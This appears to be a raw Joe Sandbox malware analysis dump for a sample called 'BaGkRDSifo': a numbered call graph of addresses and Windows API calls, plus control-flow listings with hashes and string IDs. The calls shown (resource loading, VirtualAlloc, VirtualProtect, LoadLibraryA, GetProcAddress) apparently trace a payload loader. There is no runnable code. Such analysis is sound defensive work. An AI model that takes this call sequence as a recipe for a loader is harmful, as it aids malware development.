95211 6ad65ac 11 API calls 95176->95211 95189 6ad6f20 95178->95189 95194 6ad6f10 95178->95194 95183 6ad6f20 11 API calls 95179->95183 95184 6ad6f10 11 API calls 95179->95184 95203 6ad659c 95180->95203 95183->95182 95184->95182 95185->95182 95186->95182 95190 6ad6f2b 95189->95190 95191 6ad6f32 95189->95191 95190->95182 95212 6ad6f40 95191->95212 95192 6ad6f38 95192->95182 95195 6ad6f2b 95194->95195 95196 6ad6f32 95194->95196 95195->95182 95198 6ad6f40 11 API calls 95196->95198 95197 6ad6f38 95197->95182 95198->95197 95200 6ad4e3b 95199->95200 95201 6ad6f20 11 API calls 95200->95201 95202 6ad7136 95201->95202 95202->95182 95204 6ad65a7 95203->95204 95205 6ad6f20 11 API calls 95204->95205 95206 6adad5c 95205->95206 95206->95182 95208 6ad65e7 95207->95208 95209 6ad6f20 11 API calls 95208->95209 95210 6ad95a9 95209->95210 95210->95182 95211->95182 95214 6ad6f5e 95212->95214 95215 6ad6f80 95212->95215 95213 6ad6f6c 95213->95192 95214->95213 95219 5a33688 95214->95219 95230 5a34293 95214->95230 95233 5a33678 95214->95233 95215->95192 95220 5a33689 95219->95220 95221 5a33974 95220->95221 95222 5a33fb4 GetKeyState 95220->95222 95227 5a34082 95220->95227 95221->95213 95223 5a33fe0 GetKeyState 95222->95223 95225 5a34033 GetFocus 95223->95225 95225->95227 95227->95221 95244 6ad6fc0 95227->95244 95249 6ad6fb0 95227->95249 95231 5a30bfc 5 API calls 95230->95231 95232 5a342aa 95231->95232 95232->95213 95234 5a3367c 95233->95234 95235 5a33974 95234->95235 95236 5a33fb4 GetKeyState 95234->95236 95241 5a34082 95234->95241 95235->95213 95237 5a33fe0 GetKeyState 95236->95237 95239 5a34033 GetFocus 95237->95239 95239->95241 95241->95235 95242 6ad6fb0 5 API calls 95241->95242 95243 6ad6fc0 5 API calls 95241->95243 95242->95235 95243->95235 95245 6ad7006 95244->95245 95246 6ad7029 95245->95246 95254 5a30bfc 95245->95254 95261 5a342b3 95245->95261 95246->95221 95250 6ad7006 95249->95250 95251 6ad7029 95250->95251 95252 5a342b3 5 API calls 95250->95252 95253 5a30bfc 5 API calls 95250->95253 95251->95221 95252->95251 95253->95251 95255 5a30c07 95254->95255 95256 5a34302 95255->95256 95257 5a343ac 95255->95257 95259 5a3435a CallWindowProcW 95256->95259 95260 5a34309 95256->95260 95269 5a30ad4 95257->95269 95259->95260 95260->95246 95262 5a342ba 95261->95262 95263 5a3425c 95261->95263 95264 5a34302 95262->95264 95265 5a343ac 95262->95265 95263->95246 95267 5a3435a CallWindowProcW 95264->95267 95268 5a34309 95264->95268 95266 5a30ad4 4 API calls 95265->95266 95266->95268 95267->95268 95268->95246 95270 5a30adf 95269->95270 95271 5a32c79 95270->95271 95273 5a32c69 95270->95273 95272 5a30bfc 5 API calls 95271->95272 95274 5a32c77 95272->95274 95273->95274 95278 b33de77 95273->95278 95283 a3002b8 95273->95283 95289 a3002c8 95273->95289 95279 b33de94 95278->95279 95280 b33de9d 95278->95280 95295 b33deb0 95279->95295 95304 b33dea0 95279->95304 95280->95274 95284 a3002c8 95283->95284 95285 a3002dd 95284->95285 95287 5a342b3 5 API calls 95284->95287 95288 5a30bfc 5 API calls 95284->95288 95285->95274 95286 a300308 95286->95274 95287->95286 95288->95286 95290 a3002d5 95289->95290 95291 a3002dd 95290->95291 95293 5a342b3 5 API calls 95290->95293 95294 5a30bfc 5 API calls 95290->95294 95291->95274 95292 a300308 95292->95274 95293->95292 95294->95292 95296 b33dee3 95295->95296 95297 b33dec3 95295->95297 95296->95280 95313 a3003d2 95297->95313 95320 a300432 95297->95320 95330 a3003e0 95297->95330 95298 b33decf 95336 bb84ee3 95298->95336 95299 b33dede 95299->95280 95305 b33dec3 95304->95305 95308 b33dee3 95304->95308 95309 a3003e0 2 API calls 95305->95309 95310 a3003d2 2 API calls 95305->95310 95311 a300432 2 API calls 95305->95311 95306 b33decf 95312 bb84ee3 GetCurrentThreadId 95306->95312 95307 b33dede 95307->95280 95308->95280 95309->95306 95310->95306 95311->95306 95312->95307 95314 a3003b6 95313->95314 95316 a3003de 95313->95316 95314->95298 95315 a300424 95315->95298 95316->95315 95318 a300432 2 API calls 95316->95318 95340 a300440 95316->95340 95344 a3004c2 95316->95344 95318->95315 95321 a30043b 95320->95321 95323 a3003e9 95320->95323 95325 a3004c2 2 API calls 95321->95325 95355 a3004d0 95321->95355 95322 a300424 95322->95298 95323->95322 95326 a300440 2 API calls 95323->95326 95327 a300432 2 API calls 95323->95327 95328 a3004c2 2 API calls 95323->95328 95329 a30044e 95325->95329 95326->95322 95327->95322 95328->95322 95329->95298 95332 a3003f1 95330->95332 95331 a300424 95331->95298 95332->95331 95333 a300440 2 API calls 95332->95333 95334 a300432 2 API calls 95332->95334 95335 a3004c2 2 API calls 95332->95335 95333->95331 95334->95331 95335->95331 95337 bb84efc 95336->95337 95365 bb84f00 95336->95365 95369 bb84f10 95336->95369 95337->95299 95341 a30044e 95340->95341 95342 a3004d0 KiUserCallbackDispatcher KiUserCallbackDispatcher 95340->95342 95343 a3004c2 KiUserCallbackDispatcher KiUserCallbackDispatcher 95340->95343 95341->95315 95342->95341 95343->95341 95346 a300479 95344->95346 95347 a3004cb 95344->95347 95345 a3004eb 95345->95315 95346->95315 95347->95345 95349 a300519 95347->95349 95350 a300610 KiUserCallbackDispatcher 95347->95350 95351 a300608 KiUserCallbackDispatcher 95347->95351 95348 a3005f4 95348->95315 95349->95348 95352 a3006f0 KiUserCallbackDispatcher KiUserCallbackDispatcher 95349->95352 95353 a3006e0 KiUserCallbackDispatcher KiUserCallbackDispatcher 95349->95353 95354 a300730 KiUserCallbackDispatcher KiUserCallbackDispatcher 95349->95354 95350->95349 95351->95349 95352->95349 95353->95349 95354->95349 95357 a3004e7 95355->95357 95356 a3004eb 95356->95329 95357->95356 95359 a300519 95357->95359 95363 a300610 KiUserCallbackDispatcher 95357->95363 95364 a300608 KiUserCallbackDispatcher 95357->95364 95358 a3005f4 95358->95329 95359->95358 95360 a3006f0 KiUserCallbackDispatcher KiUserCallbackDispatcher 95359->95360 95361 a3006e0 KiUserCallbackDispatcher KiUserCallbackDispatcher 95359->95361 95362 a300730 KiUserCallbackDispatcher KiUserCallbackDispatcher 95359->95362 95360->95359 95361->95359 95362->95359 95363->95359 95364->95359 95366 bb84f10 95365->95366 95367 bb82c5c GetCurrentThreadId 95366->95367 95368 bb84f45 95367->95368 95368->95337 95370 bb84f35 95369->95370 95371 bb82c5c GetCurrentThreadId 95370->95371 95372 bb84f45 95371->95372 95372->95337 96147 6ad4a00 96148 6ad4a28 96147->96148 96151 6ad2d54 96148->96151 96152 6ad2d5f 96151->96152 96157 6ad4eb2 96152->96157 96193 6ad4670 GetProcessWindowStation 96152->96193 96154 6ad4f55 96159 6ad4fec 96154->96159 96164 5a345a0 8 API calls 96154->96164 96165 5a3458f 8 API calls 96154->96165 96156 6ad50af 96160 6ad50e9 96156->96160 96171 a30f6c0 96156->96171 96178 a30f660 96156->96178 96186 a30f6b0 96156->96186 96157->96154 96158 6ad4a84 11 API calls 96157->96158 96157->96160 96158->96154 96159->96156 96166 6ad4a84 96159->96166 96164->96159 96165->96159 96167 6ad4a8f 96166->96167 96168 6ada8ac 96167->96168 96169 6ada8af 11 API calls 96167->96169 96170 6ada8c0 11 API calls 96167->96170 96168->96156 96169->96168 96170->96168 96173 a30f725 96171->96173 96172 a30f772 96172->96160 96173->96172 96174 a30d190 PeekMessageW 96173->96174 96175 a30fb88 WaitMessage 96173->96175 96194 a30fd40 96173->96194 96200 a30fd30 96173->96200 96174->96173 96175->96173 96179 a30f66f 96178->96179 96183 a30f6c8 96178->96183 96179->96160 96180 a30d190 PeekMessageW 96180->96183 96181 a30fb88 WaitMessage 96181->96183 96182 a30f772 96182->96160 96183->96180 96183->96181 96183->96182 96184 a30fd30 2 API calls 96183->96184 96185 a30fd40 2 API calls 96183->96185 96184->96183 96185->96183 96189 a30f725 96186->96189 96187 a30d190 PeekMessageW 96187->96189 96188 a30fb88 WaitMessage 96188->96189 96189->96187 96189->96188 96190 a30f772 96189->96190 96191 a30fd30 2 API calls 96189->96191 96192 a30fd40 2 API calls 96189->96192 96190->96160 96191->96189 96192->96189 96193->96157 96195 a30fd84 96194->96195 96196 a30fe41 96195->96196 96197 a30fda6 GetActiveWindow 96195->96197 96199 a30fd8d 96195->96199 96206 a30d190 96196->96206 96197->96199 96199->96173 96201 a30fd84 96200->96201 96202 a30fe41 96201->96202 96203 a30fda6 GetActiveWindow 96201->96203 96204 a30fd8d 96201->96204 96205 a30d190 PeekMessageW 96202->96205 96203->96204 96204->96173 96205->96204 96207 a30fc88 PeekMessageW 96206->96207 96208 a30fcff 96207->96208 96208->96199 95573 6adfac3 95574 6adfad6 95573->95574 95579 6adfcc0 PostMessageW 95574->95579 95581 6adfd80 95574->95581 95585 6adfce8 PostMessageW 95574->95585 95575 6adfaf9 95580 6adfd54 95579->95580 95580->95575 95582 6adfd35 PostMessageW 95581->95582 95584 6adfd87 95581->95584 95583 6adfd54 95582->95583 95583->95575 95584->95575 95586 6adfd54 95585->95586 95586->95575 95587 24ead20 95588 24ead68 VirtualProtect 95587->95588 95589 24eada2 95588->95589 96209 a30e980 96210 a30e992 96209->96210 96211 a30eaad 96210->96211 96214 a309480 96210->96214 96220 a309470 96210->96220 96215 a3094c4 96214->96215 96216 a30953e 96214->96216 96215->96216 96217 a3094d1 GetFocus 96215->96217 96216->96211 96218 a3094f9 96217->96218 96218->96216 96219 a309533 KiUserCallbackDispatcher 96218->96219 96219->96216 96221 a3094c4 96220->96221 96222 a30953e 96220->96222 96221->96222 96223 a3094d1 GetFocus 96221->96223 96222->96211 96224 a3094f9 96223->96224 96224->96222 96225 a309533 KiUserCallbackDispatcher 96224->96225 96225->96222 95590 5aaa9d8 95591 5aaa9d9 95590->95591 95595 5aaaac0 95591->95595 95604 5aaaad0 95591->95604 95592 5aaa9e7 95596 5aaaac4 95595->95596 95597 5aaab04 95596->95597 95613 5aaad68 95596->95613 95617 5aaad59 95596->95617 95621 5aaadbd 95596->95621 95597->95592 95598 5aaad08 GetModuleHandleW 95600 5aaad35 95598->95600 95599 5aaaafc 95599->95597 95599->95598 95600->95592 95605 5aaaad1 95604->95605 95606 5aaab04 95605->95606 95610 5aaad68 LoadLibraryExW 95605->95610 95611 5aaad59 LoadLibraryExW 95605->95611 95612 5aaadbd LoadLibraryExW 95605->95612 95606->95592 95607 5aaad08 GetModuleHandleW 95609 5aaad35 95607->95609 95608 5aaaafc 95608->95606 95608->95607 95609->95592 95610->95608 95611->95608 95612->95608 95614 5aaad69 95613->95614 95615 5aaada1 95614->95615 95625 5aaa510 95614->95625 95615->95599 95618 5aaad5c 95617->95618 95619 5aaa510 LoadLibraryExW 95618->95619 95620 5aaada1 95618->95620 95619->95620 95620->95599 95622 5aaad64 95621->95622 95623 5aaada1 95622->95623 95624 5aaa510 LoadLibraryExW 95622->95624 95623->95599 95624->95623 95626 5aaaf28 LoadLibraryExW 95625->95626 95628 5aaafa1 95626->95628 95628->95615 96431 b3305c0 KiUserCallbackDispatcher 96432 b330634 96431->96432 95373 6addd98 95375 6adde0b 95373->95375 95374 6ade036 GetPrivateProfileStringA 95376 6ade090 95374->95376 95375->95374 95375->95375 96226 6adaf18 96227 6adaf5d GetClassInfoW 96226->96227 96229 6adafa3 96227->96229 95377 b33e008 DispatchMessageA 95378 b33e074 95377->95378 95629 6ad52d6 95632 6ad4b30 95629->95632 95633 6ad4b3b 95632->95633 95636 6ad5aea 95633->95636 95634 6ad52e3 95637 6ad5b47 GetCurrentThreadId 95636->95637 95639 6ad5b8d 95637->95639 95639->95634 96230 b330a88 DispatchMessageW 96231 b330af4 96230->96231 96232 5a37018 96233 5a37043 96232->96233 96262 5a36d20 96233->96262 96237 5a370a6 96238 5a36d20 11 API calls 96237->96238 96239 5a370c4 96238->96239 96272 5a36d40 96239->96272 96242 5a36d30 11 API calls 96243 5a37100 96242->96243 96244 5a36d40 11 API calls 96243->96244 96245 5a3711e 96244->96245 96246 5a36d30 11 API calls 96245->96246 96247 5a3713c 96246->96247 96248 5a36d30 11 API calls 96247->96248 96249 5a3717e 96248->96249 96276 6ac03f0 96249->96276 96281 6ac0400 96249->96281 96250 5a371e5 96254 6ac0400 2 API calls 96250->96254 96255 6ac03f0 2 API calls 96250->96255 96251 5a37202 96287 6ac6428 96251->96287 96291 6ac6438 96251->96291 96252 5a37527 96295 6ace868 96252->96295 96300 6ace858 96252->96300 96253 5a37faf 96254->96251 96255->96251 96263 5a36d2b 96262->96263 96305 5a36ec0 96263->96305 96265 5a37088 96266 5a36d30 96265->96266 96267 5a36d3b 96266->96267 96269 5aa8428 11 API calls 96267->96269 96270 5aa83f8 11 API calls 96267->96270 96271 5aa59bc 11 API calls 96267->96271 96268 5a389e3 96268->96237 96269->96268 96270->96268 96271->96268 96273 5a36d4b 96272->96273 96319 5a384d8 96273->96319 96275 5a370e2 96275->96242 96278 6ac0400 96276->96278 96277 6ac0424 96277->96250 96278->96277 96325 6ac0910 96278->96325 96330 6ac0901 96278->96330 96282 6ac0424 96281->96282 96284 6ac042b 96281->96284 96282->96250 96283 6ac047e 96283->96250 96284->96283 96285 6ac0910 2 API calls 96284->96285 96286 6ac0901 2 API calls 96284->96286 96285->96283 96286->96283 96289 6ac644b 96287->96289 96288 6ac646e 96288->96252 96289->96288 96290 6ac0f88 2 API calls 96289->96290 96290->96288 96293 6ac644b 96291->96293 96292 6ac646e 96292->96252 96293->96292 96294 6ac0f88 2 API calls 96293->96294 96294->96292 96297 6ace87d 96295->96297 96296 6ac0400 2 API calls 96298 6ace90c 96296->96298 96297->96296 96299 6ace937 96297->96299 96298->96253 96299->96253 96302 6ace868 96300->96302 96301 6ac0400 2 API calls 96303 6ace90c 96301->96303 96302->96301 96304 6ace937 96302->96304 96303->96253 96304->96253 96306 5a36ecb 96305->96306 96310 5aa59bc 11 API calls 96306->96310 96311 5aa83f8 96306->96311 96315 5aa8428 96306->96315 96307 5a38364 96307->96265 96310->96307 96313 5aa83fd 96311->96313 96312 5aa8729 96312->96307 96313->96312 96314 5aaca60 11 API calls 96313->96314 96314->96312 96317 5aa8408 96315->96317 96316 5aa8729 96316->96307 96317->96315 96317->96316 96318 5aaca60 11 API calls 96317->96318 96318->96316 96320 5a384e3 96319->96320 96321 5a39772 96320->96321 96322 5aa8428 11 API calls 96320->96322 96323 5aa83f8 11 API calls 96320->96323 96324 5aa59bc 11 API calls 96320->96324 96321->96275 96322->96321 96323->96321 96324->96321 96326 6ac0931 96325->96326 96327 6ac09b3 96326->96327 96335 6ac1b50 96326->96335 96339 6ac1b60 96326->96339 96327->96277 96331 6ac0910 96330->96331 96332 6ac09b3 96331->96332 96333 6ac1b60 2 API calls 96331->96333 96334 6ac1b50 2 API calls 96331->96334 96332->96277 96333->96332 96334->96332 96336 6ac1b60 96335->96336 96337 6ac1b83 96336->96337 96338 6ac0f88 2 API calls 96336->96338 96337->96327 96338->96337 96340 6ac1b6d 96339->96340 96341 6ac1b83 96340->96341 96342 6ac0f88 2 API calls 96340->96342 96341->96327 96342->96341 95379 24eb970 95380 24eb9b3 VirtualAlloc 95379->95380 95381 24eb9e7 95380->95381 95640 24efc30 95641 24efc49 95640->95641 95644 5aa4650 95641->95644 95642 24efcb4 95645 5aa4651 95644->95645 95645->95645 95649 5aa4760 95645->95649 95654 5aa474f 95645->95654 95646 5aa467f 95646->95642 95651 5aa4787 95649->95651 95650 5aa4864 95650->95650 95651->95650 95659 5aa5be4 95651->95659 95663 5aa5bf0 95651->95663 95656 5aa4787 95654->95656 95655 5aa4864 95655->95655 95656->95655 95657 5aa5bf0 CreateActCtxA 95656->95657 95658 5aa5be4 CreateActCtxA 95656->95658 95657->95655 95658->95655 95660 5aa5bf0 CreateActCtxA 95659->95660 95662 5aa5cb3 95660->95662 95664 5aa5c73 CreateActCtxA 95663->95664 95665 5aa5cb3 95664->95665

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 0 4019f0-401ac7 OleInitialize call 401650 call 40b99e 5 40248a-402496 0->5 6 401acd-401c4f GetCurrentProcessId CreateToolhelp32Snapshot Module32First 0->6 7 401dc3-401ed4 FindCloseChangeNotification GetModuleHandleA call 401650 FindResourceA LoadResource LockResource SizeofResource call 40b84d call 40af66 6->7 8 401c55-401c6c call 401650 6->8 27 401ed6-401eed call 40ba30 7->27 28 401eef 7->28 14 401c73-401c77 8->14 16 401c93-401c95 14->16 17 401c79-401c7b 14->17 20 401c98-401c9a 16->20 18 401c7d-401c83 17->18 19 401c8f-401c91 17->19 18->16 22 401c85-401c8d 18->22 19->20 23 401cb0-401cce call 401650 20->23 24 401c9c-401caf CloseHandle 20->24 22->14 22->19 34 401cd0-401cd4 23->34 29 401ef3-401f1a call 401300 SizeofResource 27->29 28->29 38 401f1c-401f2f 29->38 39 401f5f-401f69 29->39 36 401cf0-401cf2 34->36 37 401cd6-401cd8 34->37 42 401cf5-401cf7 36->42 40 401cda-401ce0 37->40 41 401cec-401cee 37->41 44 401f33-401f5d call 401560 38->44 45 401f73-401f75 39->45 46 401f6b-401f72 39->46 40->36 47 401ce2-401cea 40->47 41->42 42->24 43 401cf9-401d09 Module32Next 42->43 43->7 48 401d0f 43->48 44->39 50 401f92-4021a4 call 40ba30 FreeResource call 40b84d SizeofResource call 40ac60 call 40ba30 call 401650 LoadLibraryA call 401650 GetProcAddress 45->50 51 401f77-401f8d call 401560 45->51 46->45 47->34 47->41 52 401d10-401d2e call 401650 48->52 50->5 87 4021aa-4021c0 50->87 51->50 61 401d30-401d34 52->61 63 401d50-401d52 61->63 64 401d36-401d38 61->64 68 401d55-401d57 63->68 66 401d3a-401d40 64->66 67 401d4c-401d4e 64->67 66->63 70 401d42-401d4a 66->70 67->68 68->24 71 401d5d-401d7b call 401650 68->71 70->61 70->67 77 401d80-401d84 71->77 78 401da0-401da2 77->78 79 401d86-401d88 77->79 83 401da5-401da7 78->83 81 401d8a-401d90 79->81 82 401d9c-401d9e 79->82 81->78 85 401d92-401d9a 81->85 82->83 83->24 86 401dad-401dbd Module32Next 83->86 85->77 85->82 86->7 86->52 89 4021c6-4021ca 87->89 90 40246a-402470 87->90 89->90 93 4021d0-402217 call 4018f0 89->93 91 402472-402475 90->91 92 40247a-402480 90->92 91->92 92->5 95 402482-402487 92->95 98 40221d-40223d 93->98 99 40244f-40245f 93->99 95->5 98->99 104 402243-402251 98->104 99->90 100 402461-402467 call 40b6b5 99->100 100->90 104->99 106 402257-4022b7 call 401870 VariantInit call 401870 VariantInit call 4018d0 104->106 114 4022c3-40232a call 4018d0 SafeArrayCreate SafeArrayAccessData call 40b350 SafeArrayUnaccessData 106->114 115 4022b9-4022be call 40ad90 106->115 122 402336-40234d call 4018d0 114->122 123 40232c-402331 call 40ad90 114->123 115->114 152 40234e call 243d006 122->152 153 40234e call 243d01d 122->153 123->122 127 402350-402352 128 402354-402355 SafeArrayDestroy 127->128 129 40235b-402361 127->129 128->129 130 402363-402368 call 40ad90 129->130 131 40236d-402375 129->131 130->131 133 402377-402379 131->133 134 40237b 131->134 135 40237d-40238f call 4018d0 133->135 134->135 154 402390 call 243d006 135->154 155 402390 call 243d01d 135->155 138 402392-4023a2 SafeArrayCreateVector 139 4023a4-4023a9 call 40ad90 138->139 140 4023ae-4023b4 138->140 139->140 142 4023b6-4023b8 140->142 143 4023ba 140->143 144 4023bc-402417 VariantClear * 2 call 4019a0 142->144 143->144 146 40241c-40242c VariantClear 144->146 147 402436-402445 call 4019a0 146->147 148 40242e-402433 146->148 147->99 151 402447-40244c 147->151 148->147 151->99 152->127 153->127 154->138 155->138
              APIs
              • OleInitialize.OLE32(00000000), ref: 004019FD
              • _getenv.LIBCMT ref: 00401ABA
              • GetCurrentProcessId.KERNEL32 ref: 00401ACD
              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
              • Module32First.KERNEL32 ref: 00401C48
              • CloseHandle.KERNEL32(00000000,?,?,00000000,?), ref: 00401C9D
              • Module32Next.KERNEL32(00000000,?), ref: 00401D02
              • Module32Next.KERNEL32(00000000,?), ref: 00401DB6
              • FindCloseChangeNotification.KERNEL32(00000000), ref: 00401DC4
              • GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
              • FindResourceA.KERNEL32(00000000,00000000,00000000), ref: 00401E90
              • LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
              • LockResource.KERNEL32(00000000), ref: 00401EA7
              • SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
              • _malloc.LIBCMT ref: 00401EBA
              • _memset.LIBCMT ref: 00401EDD
              • SizeofResource.KERNEL32(00000000,?), ref: 00401F02
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2475135798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2475039606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475261236.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475334082.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475395338.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475479388.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475479388.00000000007CD000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_BaGkRDSifo.jbxd
              Similarity
              • API ID: Resource$Module32$CloseFindHandleNextSizeof$ChangeCreateCurrentFirstInitializeLoadLockModuleNotificationProcessSnapshotToolhelp32_getenv_malloc_memset
              • String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
              • API String ID: 2366190142-2962942730
              • Opcode ID: f33ec6517a8e462eea4e7ce496cce69d106849ef0d44fd50fc6c48668fb332a6
              • Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
              • Opcode Fuzzy Hash: f33ec6517a8e462eea4e7ce496cce69d106849ef0d44fd50fc6c48668fb332a6
              • Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 468 5a37008-5a37075 call 5a36d10 477 5a3707f-5a37083 call 5a36d20 468->477 479 5a37088-5a37093 477->479 481 5a3709d-5a370a1 call 5a36d30 479->481 483 5a370a6-5a371a6 call 5a36d20 call 5a36d40 call 5a36d30 call 5a36d40 call 5a36d30 call 5a36d50 call 5a36d30 481->483 515 5a371af-5a371c2 483->515 761 5a371c5 call 5aafa10 515->761 762 5a371c5 call 5aafa01 515->762 516 5a371c8-5a371d0 call 5a36d60 518 5a371d5-5a371df 516->518 763 5a371e2 call 6ac0400 518->763 764 5a371e2 call 6ac03f0 518->764 519 5a371e5-5a371ed call 5a36d60 521 5a371f2-5a371fc 519->521 755 5a371ff call 6ac0400 521->755 756 5a371ff call 6ac03f0 521->756 522 5a37202-5a3728d call 5a36d60 * 5 537 5a37293-5a372c8 call 5a36d70 522->537 539 5a372cd-5a37321 call 5a36d80 call 5a36d90 537->539 544 5a37326-5a37333 call 5a36da0 539->544 546 5a37338-5a37370 544->546 549 5a37379-5a37386 call 5a36db0 546->549 551 5a3738b-5a373f3 call 5a36dc0 549->551 558 5a373f9-5a3742e call 5a36d70 551->558 560 5a37433-5a3750f call 5a36d80 call 5a36d90 call 5a36da0 call 5a36dd0 call 5a36de0 558->560 575 5a37514-5a37521 560->575 759 5a37524 call 6ac6428 575->759 760 5a37524 call 6ac6438 575->760 576 5a37527-5a378b5 call 5a36dc0 call 5a36d70 call 5a36d80 call 5a36d90 call 5a36da0 call 5a36db0 call 5a36dc0 call 5a36d70 call 5a36d80 call 5a36d90 call 5a36da0 call 5a36dd0 call 5a36de0 624 5a378bf-5a378d1 call 5a36dc0 576->624 626 5a378d6-5a37ef1 call 5a36d70 call 5a36d80 call 5a36df0 call 5a36d90 call 5a36da0 call 5a36dc0 call 5a36d70 call 5a36d80 call 5a36d90 call 5a36da0 call 5a36dc0 call 5a36d70 call 5a36d80 call 5a36d90 call 5a36da0 call 5a36dc0 call 5a36d70 call 5a36d80 call 5a36d90 call 5a36da0 call 5a36e00 call 5a36dc0 call 5a36d70 call 5a36d80 call 5a36d90 call 5a36da0 624->626 712 5a37ef6-5a37efe call 5a36e10 626->712 714 5a37f03-5a37f94 call 5a36e20 call 5a36e30 call 5a36e40 call 5a36e50 call 5a36d60 712->714 725 5a37f99-5a37fa9 714->725 767 5a37fac call 6ace868 725->767 768 5a37fac call 6ace858 725->768 726 5a37faf-5a37fc6 call 5a36d60 729 5a37fcc-5a37fd0 call 5a36e60 726->729 731 5a37fd5-5a38078 call 5a36d80 call 5a36e70 call 5a3577c * 2 729->731 748 5a3807f-5a38087 731->748 765 5a38089 call 6ac1660 748->765 766 5a38089 call 6ac1670 748->766 749 5a3808e-5a3809d call 5a36e80 757 5a3809f call 6ac1660 749->757 758 5a3809f call 6ac1670 749->758 752 5a380a4-5a380a6 call 5a36e80 754 5a380ab-5a380b2 752->754 755->522 756->522 757->752 758->752 759->576 760->576 761->516 762->516 763->519 764->519 765->749 766->749 767->726 768->726
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2490318078.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5a30000_BaGkRDSifo.jbxd
              Similarity
              • API ID:
              • String ID: $ $ 'Gq$)$*$8$;$;$>$>$>$?$F$\$c$i$i$|$|
              • API String ID: 0-2839787044
              • Opcode ID: 66b83e448cf826b066923735d005b046012bebf69b61312dda9ffb1b90c4bbcc
              • Instruction ID: 5975dfb421f1c08687797f25aa63a147d55cfffbd119be8dd33d8cfe20adddc1
              • Opcode Fuzzy Hash: 66b83e448cf826b066923735d005b046012bebf69b61312dda9ffb1b90c4bbcc
              • Instruction Fuzzy Hash: 4CA20634A10A14CFCB25EF74C958BDAB7B2BF89304F1045A9E14AAB360DB35AD85CF51

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 769 5a37018-5a371c2 call 5a36d10 call 5a36d20 call 5a36d30 call 5a36d20 call 5a36d40 call 5a36d30 call 5a36d40 call 5a36d30 call 5a36d50 call 5a36d30 1061 5a371c5 call 5aafa10 769->1061 1062 5a371c5 call 5aafa01 769->1062 816 5a371c8-5a371df call 5a36d60 1063 5a371e2 call 6ac0400 816->1063 1064 5a371e2 call 6ac03f0 816->1064 819 5a371e5-5a371fc call 5a36d60 1055 5a371ff call 6ac0400 819->1055 1056 5a371ff call 6ac03f0 819->1056 822 5a37202-5a37521 call 5a36d60 * 5 call 5a36d70 call 5a36d80 call 5a36d90 call 5a36da0 call 5a36db0 call 5a36dc0 call 5a36d70 call 5a36d80 call 5a36d90 call 5a36da0 call 5a36dd0 call 5a36de0 1059 5a37524 call 6ac6428 822->1059 1060 5a37524 call 6ac6438 822->1060 876 5a37527-5a37fa9 call 5a36dc0 call 5a36d70 call 5a36d80 call 5a36d90 call 5a36da0 call 5a36db0 call 5a36dc0 call 5a36d70 call 5a36d80 call 5a36d90 call 5a36da0 call 5a36dd0 call 5a36de0 call 5a36dc0 call 5a36d70 call 5a36d80 call 5a36df0 call 5a36d90 call 5a36da0 call 5a36dc0 call 5a36d70 call 5a36d80 call 5a36d90 call 5a36da0 call 5a36dc0 call 5a36d70 call 5a36d80 call 5a36d90 call 5a36da0 call 5a36dc0 call 5a36d70 call 5a36d80 call 5a36d90 call 5a36da0 call 5a36e00 call 5a36dc0 call 5a36d70 call 5a36d80 call 5a36d90 call 5a36da0 call 5a36e10 call 5a36e20 call 5a36e30 call 5a36e40 call 5a36e50 call 5a36d60 1067 5a37fac call 6ace868 876->1067 1068 5a37fac call 6ace858 876->1068 1026 5a37faf-5a38087 call 5a36d60 call 5a36e60 call 5a36d80 call 5a36e70 call 5a3577c * 2 1065 5a38089 call 6ac1660 1026->1065 1066 5a38089 call 6ac1670 1026->1066 1049 5a3808e-5a3809d call 5a36e80 1057 5a3809f call 6ac1660 1049->1057 1058 5a3809f call 6ac1670 1049->1058 1052 5a380a4-5a380a6 call 5a36e80 1054 5a380ab-5a380b2 1052->1054 1055->822 1056->822 1057->1052 1058->1052 1059->876 1060->876 1061->816 1062->816 1063->819 1064->819 1065->1049 1066->1049 1067->1026 1068->1026
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2490318078.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5a30000_BaGkRDSifo.jbxd
              Similarity
              • API ID:
              • String ID: $ $ 'Gq$)$*$8$;$;$>$>$>$?$F$\$c$i$i$|$|
              • API String ID: 0-2839787044
              • Opcode ID: 2ac4982f2a9a697d559c7b303975ff2aaeeb0a50121a2e41beb79cd60c71de27
              • Instruction ID: 2c7eaaccdf3446a4bf96e70101026f5f0d424f0d7fe04f524ba06b32b5cf6b39
              • Opcode Fuzzy Hash: 2ac4982f2a9a697d559c7b303975ff2aaeeb0a50121a2e41beb79cd60c71de27
              • Instruction Fuzzy Hash: 7EA20634A10A14CFCB25EF74C958BDAB7B2BF89304F1045A9E14AAB360DB35AD85CF51

              Control-flow Graph

